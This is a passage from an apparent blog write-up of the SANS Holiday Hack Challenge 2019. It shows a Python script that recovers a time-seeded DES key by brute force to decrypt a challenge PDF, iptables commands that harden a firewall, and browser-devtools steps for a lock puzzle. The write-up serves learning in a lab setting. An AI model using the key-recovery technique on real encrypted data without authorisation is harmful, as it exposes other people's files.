    &lt;span class="n"&gt;decryptor&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;DES&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;mode&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;DES&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;MODE_CBC&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;IV&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sa"&gt;b&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="se"&gt;\x00\x00\x00\x00\x00\x00\x00\x00&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="n"&gt;plain_text&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;decryptor&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;decrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;plain_text&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nb"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;usage: {} &amp;lt;file_to_decrypt&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;

    &lt;span class="n"&gt;encrypted_file_name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;encrypted_file_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;rb&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;read&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="c1"&gt;# We know the file was encrypted on December 6, 2019, between 7pm and 9pm UTC&lt;/span&gt;
    &lt;span class="n"&gt;initial_time&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;datetime&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;datetime&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;2019&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;12&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;6&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;19&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mo"&gt;00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mo"&gt;00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;tzinfo&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;datetime&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;timezone&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;utc&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;end_time&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;datetime&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;datetime&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;2019&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;12&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;6&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;21&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mo"&gt;00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mo"&gt;00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;tzinfo&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;datetime&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;timezone&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;utc&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="n"&gt;min_seed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;initial_time&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;timestamp&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
    &lt;span class="n"&gt;max_seed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;end_time&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;timestamp&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;

    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="n"&gt;min_seed&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="n"&gt;max_seed&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;key_candidate&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;generate_key&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;min_seed&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;decrypted_file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;decrypt_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key_candidate&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="c1"&gt;# We know the file is a PDF, so we look for the beginning of a PDF&lt;/span&gt;
        &lt;span class="c1"&gt;# file. If the decrypted data starts with &amp;quot;%PDF&amp;quot;, we must have&lt;/span&gt;
        &lt;span class="c1"&gt;# found the correct key.&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;decrypted_file&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;startswith&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;b&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;%PDF&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="n"&gt;decrypted_file_name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;./{}_{}&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key_candidate&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hex&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="n"&gt;encrypted_file_name&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;decrypted_file_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;wb&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;decrypted_file&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

            &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;[+] We managed to decrypt the file&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;[*] Initial seed: {}&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;min_seed&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
            &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;[*] Encryption key: {}&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key_candidate&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hex&lt;/span&gt;&lt;span class="p"&gt;()))&lt;/span&gt;
            &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;[+] Decrypted file saved under {}&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;decrypted_file_name&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;
        &lt;span class="n"&gt;min_seed&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's launch our script:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ./decrypt_file.py ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc
&lt;span class="go"&gt;[+] We managed to decrypt the file&lt;/span&gt;
&lt;span class="go"&gt;[*] Initial seed: 1575663650&lt;/span&gt;
&lt;span class="go"&gt;[*] Encryption key: b5ad6a321240fbec&lt;/span&gt;
&lt;span class="go"&gt;[+] Decrypted file saved under ./b5ad6a321240fbec_ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Yay! We managed to decrypt the file. You can download it &lt;a class="reference external" href="/docs/sans-christmas-challenge-2019/ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf"&gt;here&lt;/a&gt;.
It seems to be a quick start guide for Santa's Super Sled-O-Matic Machine
Learning Sleigh Route Finder, which seems to be a device mounted on Santa's
sled to help him find his route for his delivery.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-11"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id37"&gt;Objective 11:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="kent-tinseltooth-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id38"&gt;Kent Tinseltooth's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We arrive on Kent having an internal monologue. Apparently his IoT braces were
hacked:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Inner Voice: Kent. Kent. Wake up, Kent.&lt;/span&gt;
&lt;span class="go"&gt;Inner Voice: I&amp;#39;m talking to you, Kent.&lt;/span&gt;
&lt;span class="go"&gt;Kent TinselTooth: Who said that? I must be going insane.&lt;/span&gt;
&lt;span class="go"&gt;Kent TinselTooth: Am I?&lt;/span&gt;
&lt;span class="go"&gt;Inner Voice: That remains to be seen, Kent. But we are having a conversation.&lt;/span&gt;
&lt;span class="go"&gt;Inner Voice: This is Santa, Kent, and you&amp;#39;ve been a very naughty boy.&lt;/span&gt;
&lt;span class="go"&gt;Kent TinselTooth: Alright! Who is this?! Holly? Minty? Alabaster?&lt;/span&gt;
&lt;span class="go"&gt;Inner Voice: I am known by many names. I am the boss of the North Pole. Turn to me and be hired after graduation.&lt;/span&gt;
&lt;span class="go"&gt;Kent TinselTooth: Oh, sure.&lt;/span&gt;
&lt;span class="go"&gt;Inner Voice: Cut the candy, Kent, you&amp;#39;ve built an automated, machine-learning, sleigh device.&lt;/span&gt;
&lt;span class="go"&gt;Kent TinselTooth: How did you know that?&lt;/span&gt;
&lt;span class="go"&gt;Inner Voice: I&amp;#39;m Santa - I know everything.&lt;/span&gt;
&lt;span class="go"&gt;Kent TinselTooth: Oh. Kringle. *sigh*&lt;/span&gt;
&lt;span class="go"&gt;Inner Voice: That&amp;#39;s right, Kent. Where is the sleigh device now?&lt;/span&gt;
&lt;span class="go"&gt;Kent TinselTooth: I can&amp;#39;t tell you.&lt;/span&gt;
&lt;span class="go"&gt;Inner Voice: How would you like to intern for the rest of time?&lt;/span&gt;
&lt;span class="go"&gt;Kent TinselTooth: Please no, they&amp;#39;re testing it at srf.elfu.org using default creds, but I don&amp;#39;t know more. It&amp;#39;s classified.&lt;/span&gt;
&lt;span class="go"&gt;Inner Voice: Very good Kent, that&amp;#39;s all I needed to know.&lt;/span&gt;
&lt;span class="go"&gt;Kent TinselTooth: I thought you knew everything?&lt;/span&gt;
&lt;span class="go"&gt;Inner Voice: Nevermind that. I want you to think about what you&amp;#39;ve researched and studied. From now on, stop playing with your teeth, and floss more.&lt;/span&gt;
&lt;span class="go"&gt;*Inner Voice Goes Silent*&lt;/span&gt;

&lt;span class="go"&gt;Kent TinselTooth: Oh no, I sure hope that voice was Santa&amp;#39;s.&lt;/span&gt;
&lt;span class="go"&gt;Kent TinselTooth: I suspect someone may have hacked into my IOT teeth braces.&lt;/span&gt;
&lt;span class="go"&gt;Kent TinselTooth: I must have forgotten to configure the firewall...&lt;/span&gt;
&lt;span class="go"&gt;Kent TinselTooth: Please review /home/elfuuser/IOTteethBraces.md and help me configure the firewall.&lt;/span&gt;
&lt;span class="go"&gt;Kent TinselTooth: Please hurry; having this ribbon cable on my teeth is uncomfortable.&lt;/span&gt;
&lt;span class="gp"&gt;elfuuser@54cbc0276e93:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;He needs our help to harden the firewall rules for his braces, even though he
was super rude during our Splunk experiment! Let's take a look at the rules he
needs implemented:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfuuser@54cbc0276e93:~$&lt;/span&gt; cat /home/elfuuser/IOTteethBraces.md
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
# ElfU Research Labs - Smart Braces
### A Lightweight Linux Device for Teeth Braces
### Imagined and Created by ElfU Student Kent TinselTooth

This device is embedded into one's teeth braces for easy management and monitoring of dental status. It uses FTP and HTTP for management and monitoring purposes but also has SSH for remote access. Please refer to the management documentation for this purpose.

## Proper Firewall configuration:

The firewall used for this system is `iptables`. The following is an example of how to set a default policy with using `iptables`:

```
sudo iptables -P FORWARD DROP
```

The following is an example of allowing traffic from a specific IP and to a specific port:

```
sudo iptables -A INPUT -p tcp --dport 25 -s 172.18.5.4 -j ACCEPT
```

A proper configuration for the Smart Braces should be exactly:

1. Set the default policies to DROP for the INPUT, FORWARD, and OUTPUT chains.
2. Create a rule to ACCEPT all connections that are ESTABLISHED,RELATED on the INPUT and the OUTPUT chains.
3. Create a rule to ACCEPT only remote source IP address 172.19.0.225 to access the local SSH server (on port 22).
4. Create a rule to ACCEPT any source IP to the local TCP services on ports 21 and 80.
5. Create a rule to ACCEPT all OUTPUT traffic with a destination TCP port of 80.
6. Create a rule applied to the INPUT chain to ACCEPT all traffic from the lo interface.
&lt;/pre&gt;
&lt;p&gt;Let's take care of the first rule, setting the default policies to &lt;code&gt;DROP&lt;/code&gt;
for the three mentioned chains:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfuuser@54cbc0276e93:~$&lt;/span&gt; sudo iptables -P INPUT DROP
&lt;span class="gp"&gt;elfuuser@54cbc0276e93:~$&lt;/span&gt; sudo iptables -P FORWARD DROP
&lt;span class="gp"&gt;elfuuser@54cbc0276e93:~$&lt;/span&gt; sudo iptables -P OUTPUT DROP
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;On to the second rule. We must accept already established incoming and outgoing
connections:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfuuser@e57e7cd77272:~$&lt;/span&gt; sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
&lt;span class="gp"&gt;elfuuser@e57e7cd77272:~$&lt;/span&gt; sudo iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For the third rule, we must restrict input connections. To be more specific,
only the IP address &lt;code&gt;172.19.0.225&lt;/code&gt; is allowed to access the local SSH
server on TCP port 22:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfuuser@e57e7cd77272:~$&lt;/span&gt; sudo iptables -A INPUT -s &lt;span class="m"&gt;172&lt;/span&gt;.19.0.225/32 -p tcp --dport &lt;span class="m"&gt;22&lt;/span&gt; -j ACCEPT
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The fourth rule also concerns incoming connections. However, the rule is a bit
more permissive: anyone can connect to the TCP port 21 and 80:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfuuser@e57e7cd77272:~$&lt;/span&gt; sudo iptables -A INPUT -p tcp --dport &lt;span class="m"&gt;21&lt;/span&gt; -j ACCEPT
&lt;span class="gp"&gt;elfuuser@e57e7cd77272:~$&lt;/span&gt; sudo iptables -A INPUT -p tcp --dport &lt;span class="m"&gt;80&lt;/span&gt; -j ACCEPT
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The fifth rule concerns outgoing traffic: we must allow every connection to
external TCP port 80:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfuuser@e57e7cd77272:~$&lt;/span&gt; sudo iptables -A OUTPUT -p tcp --dport &lt;span class="m"&gt;80&lt;/span&gt; -j ACCEPT
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Finally, any incoming connection from the loopback &lt;code&gt;lo&lt;/code&gt; connection is
authorized:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfuuser@e57e7cd77272:~$&lt;/span&gt; sudo iptables -A INPUT -i lo -j ACCEPT
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once we have done everything, Kent thanks us:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
Kent TinselTooth: Great, you hardened my IOT Smart Braces firewall!
&lt;/pre&gt;
&lt;/div&gt;
&lt;div class="section" id="open-the-sleigh-shop-door"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id39"&gt;Open the Sleigh Shop Door&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We must try to get access to the Sleigh Shop. The door is garded by Shiny
Upatree.&lt;/p&gt;
&lt;img alt="shiny_upatree.png" class="align-center" src="/images/sans-christmas-challenge-2019/shiny_upatree.png" /&gt;
&lt;p&gt;&lt;em&gt;Shiny Upatree says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Psst - hey!&lt;/p&gt;
&lt;p&gt;I'm Shinny Upatree, and I know what's going on!&lt;/p&gt;
&lt;p&gt;Yeah, that's right - guarding the sleigh shop has made me privvy to some
serious, high-level intel.&lt;/p&gt;
&lt;p&gt;In fact, I know WHO is causing all the trouble.&lt;/p&gt;
&lt;p&gt;Cindy? Oh no no, not that who. And stop guessing - you'll never figure it
out.&lt;/p&gt;
&lt;p&gt;The only way you could would be if you could break into &lt;a class="reference external" href="https://crate.elfu.org/"&gt;my crate&lt;/a&gt;,
here.&lt;/p&gt;
&lt;p&gt;You see, I've written the villain's name down on a piece of paper and
hidden it away securely!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, we must try to break into &lt;a class="reference external" href="https://crate.elfu.org/"&gt;Shiny's crate&lt;/a&gt;. It
seems to be locked with several locks, and we have to solve riddles to find the
codes to unlock them.&lt;/p&gt;
&lt;p&gt;It's important to notice that the codes change every time we reload the page,
and every lock must be unlocked in one go. So be careful if you reload the
page, or perform an action that would reload the page (like displaying the
source code via &lt;code&gt;Ctrl+U&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;Let's go:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;You don't need a clever riddle to open the console and scroll a little.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;So, let's open the browser console, in the developer tools, and scroll to the
top:&lt;/p&gt;
&lt;img alt="lock_1_console.png" class="align-center" src="/images/sans-christmas-challenge-2019/lock_1_console.png" /&gt;
&lt;p&gt;We get our first code: &lt;code&gt;AF1XO1BQ&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="2"&gt;
&lt;li&gt;Some codes are hard to spy, perhaps they'll show up on pulp with dye?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Hmmm, what? I didn't understand anything, so I took a look at the hints:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Most paper is made out of pulp.&lt;/li&gt;
&lt;li&gt;How can you view this page on paper?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can view this page, by printing it! Let's try to print it to a PDF file:&lt;/p&gt;
&lt;img alt="lock_2_print.png" class="align-center" src="/images/sans-christmas-challenge-2019/lock_2_print.png" /&gt;
&lt;p&gt;We get our next code: &lt;code&gt;17OT8MUP&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="3"&gt;
&lt;li&gt;This code is still unknown; it was fetched but never shown.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Hmm, the riddle seems to imply that the code was downloaded by the browser.
Let's see in our browser network tab:&lt;/p&gt;
&lt;img alt="lock_3_fetch.png" class="align-center" src="/images/sans-christmas-challenge-2019/lock_3_fetch.png" /&gt;
&lt;p&gt;We get our next code: &lt;code&gt;NZ50BMID&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="4"&gt;
&lt;li&gt;Where might we keep the things we forage? Yes, of course: Local barrels!&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The riddle seems to hint to taking a look at the local storage:&lt;/p&gt;
&lt;img alt="lock_4_local_storage.png" class="align-center" src="/images/sans-christmas-challenge-2019/lock_4_local_storage.png" /&gt;
&lt;p&gt;We get our next code: &lt;code&gt;TBM5L28P&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="5"&gt;
&lt;li&gt;Did you notice the code in the title? It may very well prove vital.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;We look at the title in the browser's window name:&lt;/p&gt;
&lt;img alt="lock_5_browser_title.png" class="align-center" src="/images/sans-christmas-challenge-2019/lock_5_browser_title.png" /&gt;
&lt;p&gt;We get our next code: &lt;code&gt;QWSJCUG9&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="6"&gt;
&lt;li&gt;In order for this hologram to be effective, it may be necessary to increase
your perspective.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I didn't understand the riddle, so let's take a look at a hint:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;code&gt;perspective&lt;/code&gt; is a css property.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Alright, let's take a look at the &lt;code&gt;perspective&lt;/code&gt; attribute of the image
next to the lock:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;hologram&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;perspective&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;15&lt;/span&gt;&lt;span class="kt"&gt;px&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;width&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;150&lt;/span&gt;&lt;span class="kt"&gt;px&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;height&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="kt"&gt;px&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;border-radius&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;20&lt;/span&gt;&lt;span class="kt"&gt;px&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;transition&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="k"&gt;perspective&lt;/span&gt; &lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="kt"&gt;s&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's increase the &lt;code&gt;perspective&lt;/code&gt; attribute:&lt;/p&gt;
